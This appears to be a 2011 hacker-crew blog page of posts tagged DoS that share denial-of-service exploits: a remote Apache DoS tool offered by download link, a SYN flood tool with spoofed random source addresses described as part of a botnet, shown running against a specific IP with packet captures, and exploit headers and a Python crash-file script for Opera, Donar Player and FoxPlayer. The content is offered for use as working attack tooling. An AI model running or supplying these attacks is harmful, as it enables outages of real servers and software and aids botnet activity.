Showing posts with label DoS. Show all posts
Showing posts with label DoS. Show all posts
Sep 18, 2011

2
Remote Apache Denial of Service Exploit | coded by ev1lut10n

Download url : http://jayakonstruksi.com/backupintsec/rapache.tgz

bug found by : Nikolaus Rango (Kingcope)
sploit coded by : ev1lut10n
evllut10n's email :  ev1lut10n_exploit@yahoo.com
ev1lut10n's gopher : gopher://sdf.org/1/users/ev1lut10
thanks to: X-hack, Danzel, superman,flyff666,peneter,wenkhairu, fadli,gunslinger,petimati,net_spy, and all my friends and you !
=================
root@ev1l:/home/ev1lut10n# ./rapache
Remote Apache Denial of Service Exploit by ev1lut10n
[-] Usage : ./rapache hostname
root@ev1l:/home/ev1lut10n#
===================

===========
affected:
Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19
==============
Aug 29, 2011

0
A SYN Flood with Random Spoofed Source Address and Random Delay and U may specify how many forks

ev1syn2.c it's a a part of Int-Sec Botnet from my friend ev1lut10n

here is the source ev1syn2.c

sample usage:


# ./ev1syn2 77.78.103.36 80 80 2 2

[+] Delay Range Set to 2 second(s) and fork number set to 2 fork[s]


[+] New PID Set


[+] New PID Set


[+] New PID Set


[+] New PID Set

[+] Creating raw socket to attack 77.78.103.36 on port 80

[+] IP header set

[+] TCP header set

[+] Injected ip datagram

[+] Socket option set

[+] SYN sent to [77.78.103.36:80] using spoofed ip: [83.85.162.151:80]

[+] SYN sent to [77.78.103.36:80] using spoofed ip: [121.249.252.241:80]

[+] SYN sent to [77.78.103.36:80] using spoofed ip: [233.19.20.82:80]

[+] SYN sent to [77.78.103.36:80] using spoofed ip: [31.142.81.45:80]

[+] SYN sent to [77.78.103.36:80] using spoofed ip: [167.39.87.8:80]

[+] SYN sent to [77.78.103.36:80] using spoofed ip: [130.82.208.212:80]

[+] SYN sent to [77.78.103.36:80] using spoofed ip: [74.153.27.117:80]



and the capture is correct now:


=========


No. Time Source Destination Protocol Info

18 10.831261 83.85.162.151 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0


Frame 18 (54 bytes on wire, 54 bytes captured)

Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)

Internet Protocol, Src: 83.85.162.151 (83.85.162.151), Dst: 77.78.103.36 (77.78.103.36)

Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0

Source port: http (80)

Destination port: http (80)

[Stream index: 0]

Sequence number: 0 (relative sequence number)

Header length: 20 bytes

Flags: 0x02 (SYN)

Window size: 0

Checksum: 0x0000 [validation disabled]


No. Time Source Destination Protocol Info

19 11.831563 121.249.252.241 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0


Frame 19 (54 bytes on wire, 54 bytes captured)

Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)

Internet Protocol, Src: 121.249.252.241 (121.249.252.241), Dst: 77.78.103.36 (77.78.103.36)

Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0

Source port: http (80)

Destination port: http (80)

[Stream index: 1]

Sequence number: 0 (relative sequence number)

Header length: 20 bytes

Flags: 0x02 (SYN)

Window size: 0

Checksum: 0x0000 [validation disabled]


No. Time Source Destination Protocol Info

20 11.831670 233.19.20.82 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0


Frame 20 (54 bytes on wire, 54 bytes captured)

Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)

Internet Protocol, Src: 233.19.20.82 (233.19.20.82), Dst: 77.78.103.36 (77.78.103.36)

Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0

Source port: http (80)

Destination port: http (80)

[Stream index: 2]

Sequence number: 0 (relative sequence number)

Header length: 20 bytes

Flags: 0x02 (SYN)

Window size: 0

Checksum: 0x0000 [validation disabled]


No. Time Source Destination Protocol Info

21 11.831767 31.142.81.45 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0


Frame 21 (54 bytes on wire, 54 bytes captured)

Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)

Internet Protocol, Src: 31.142.81.45 (31.142.81.45), Dst: 77.78.103.36 (77.78.103.36)

Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0

Source port: http (80)

Destination port: http (80)

[Stream index: 3]

Sequence number: 0 (relative sequence number)

Header length: 20 bytes

Flags: 0x02 (SYN)

Window size: 0

Checksum: 0x0000 [validation disabled]


No. Time Source Destination Protocol Info

22 11.859795 10.162.160.1 255.255.255.255 DHCP DHCP Offer - Transaction ID 0x5e8f01e6


Frame 22 (329 bytes on wire, 329 bytes captured)

Ethernet II, Src: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9), Dst: Broadcast (ff:ff:ff:ff:ff:ff)

Internet Protocol, Src: 10.162.160.1 (10.162.160.1), Dst: 255.255.255.255 (255.255.255.255)

User Datagram Protocol, Src Port: bootps (67), Dst Port: bootpc (68)

Bootstrap Protocol


No. Time Source Destination Protocol Info

23 12.832008 167.39.87.8 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0


Frame 23 (54 bytes on wire, 54 bytes captured)

Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)

Internet Protocol, Src: 167.39.87.8 (167.39.87.8), Dst: 77.78.103.36 (77.78.103.36)

Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0

Source port: http (80)

Destination port: http (80)

[Stream index: 4]

Sequence number: 0 (relative sequence number)

Header length: 20 bytes

Flags: 0x02 (SYN)

Window size: 0

Checksum: 0x0000 [validation disabled]


No. Time Source Destination Protocol Info

24 12.832110 130.82.208.212 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0


Frame 24 (54 bytes on wire, 54 bytes captured)

Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)

Internet Protocol, Src: 130.82.208.212 (130.82.208.212), Dst: 77.78.103.36 (77.78.103.36)

Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0

Source port: http (80)

Destination port: http (80)

[Stream index: 5]

Sequence number: 0 (relative sequence number)

Header length: 20 bytes

Flags: 0x02 (SYN)

Window size: 0

Checksum: 0x0000 [validation disabled]

Thanks to ev1 for this good tool
Aug 24, 2011

0
Opera Web Browser 11.50 DoS

# Exploit Title : Opera Web Browser 11.50 DoS
# Software      : http://www.opera.com/download/
# Version       : 11.50
# Tested on     : Windows Vista SP1
# Date          : 20/08/2011
# Author        : X-h4ck
# Website       : http://www.pirate.al , http://theflashcrew.blogspot.com
# Email         : mem001@live.com
# Greetz        : Wulns~ - Danzel - IllyrianWarrior- Ace - M4yh3m - Saldeath - mywisdom - bi0 - Slimshaddy - d3trimentaL - Lekosta - Rigon - H-Down - H3ll
 
Exploit Here
Jul 3, 2011

0
Donar Player 2.8.0 Denial of Service

# Title         : Donar Player 2.8.0 Denial of Service
# Software link : http://www.donarzone.com/downloads/donar-player-setup-free.exe , http://www.donarzone.com/donar-player
# Version       : 2.8.0
# Tested on     : Windows XP SP3 English
# Date          : 3/07/2011
# Author        : X-h4ck
# Website       : http://www.pirate.al , # PirateAL Crew @2011 , http://theflashcrew.blogspot.com

Link: http://www.exploit-db.com/exploits/17471/

0
FoxPlayer 2.6.0 Denial of Service

# ########################################
# Exploit Title : FoxPlayer 2.6.0 Denial of Service
# Software link : http://www.foxmediatools.com/products/foxplayer.html
# Version       : 2.6.0
# Tested on     : Windows XP SP3 English
# Date          : 2/07/2011
# Author        : X-h4ck
# Website       : http://www.pirate.al , # PirateAL Crew @2011 
# Email         : mem001@live.com
# Greetz        : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta 
# 
# ++++++++++++++++++++++++++++++++++++++++
# EAX 00000001
# ECX 80604824
# EDX F98D29A0
# EBX 009E3F24
# ESP 00D7FF24
# EBP 00D7FF58
# ESI 00D7FF80
# EDI 00150178
# EIP 7C90E440 ntdll.KiUserCallbackDispatcher
# C 0  ES 0023 32bit 0(FFFFFFFF)
# P 1  CS 001B 32bit 0(FFFFFFFF)
# A 0  SS 0023 32bit 0(FFFFFFFF)
# Z 1  DS 0023 32bit 0(FFFFFFFF)
# S 0  FS 003B 32bit 7FFDC000(FFF)
# T 0  GS 0000 NULL
# D 0
# O 0  LastErr ERROR_SUCCESS (00000000)
# EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
# ST0 empty -4.0939429568750045000e-304
# ST1 empty 4.3561165078637922000e+184
# ST2 empty 4.1992150799306400000e-314
# ST3 empty -4.1012839767180717000e-304
# ST4 empty 3.8485487393211591000e+032
# ST5 empty -4.1034116763009024000e-304
# ST6 empty 1.1842037541513188000e-103
# ST7 empty 1.2519775166695107000e-312
#               3 2 1 0      E S P U O Z D I
# FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
# FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
# ++++++++++++++++++++++++++++++++++++++++

#!/usr/bin/python  

try:
    junk = "\x41" * 100000 
    f = open("crash.m3u",'w')
    f.write(junk)
    f.close()
    print "File created succesfuly\n"
except:
    print "ERROR!\n" 
 
FlashcRew Blog